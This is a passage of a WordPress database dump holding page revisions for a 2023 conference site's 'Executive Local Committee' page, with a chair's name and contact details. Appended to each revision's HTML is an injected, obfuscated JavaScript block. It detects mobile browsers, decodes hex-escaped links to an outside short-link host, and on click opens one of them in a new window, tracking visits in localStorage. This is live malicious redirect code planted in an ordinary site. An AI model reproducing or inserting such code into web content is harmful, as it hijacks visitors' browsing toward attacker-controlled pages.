wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 08:05:14','2023-06-27 08:05:14','',4849,'https://gsw2023.com/?p=4870',0,'revision','',0),
(4871,4,'2023-06-27 08:15:54','2023-06-27 08:15:54','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"large\" style=\"vc_box_rounded\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 14pt;\"><strong>Chair</strong></span></p>\r\n<hr />\r\n<p><span style=\"font-size: 12pt;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\r\nVice President for Post Graduate and Scientific Research<br />\r\nArab Academy for Science, Technology and Maritime Transport<br />\r\nP.O.Box 1029, Alexandria, Egypt</p>\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 08:15:54','2023-06-27 08:15:54','',4849,'https://gsw2023.com/?p=4871',0,'revision','',0),
(4872,4,'2023-06-27 08:44:03','2023-06-27 08:44:03','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"full\" style=\"vc_box_rounded\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 14pt;\"><strong>Chair</strong></span></p>\r\n<hr />\r\n<p><span style=\"font-size: 12pt;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\r\nVice President for Post Graduate and Scientific Research<br />\r\nArab Academy for Science, Technology and Maritime Transport<br />\r\nP.O.Box 1029, Alexandria, Egypt</p>\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 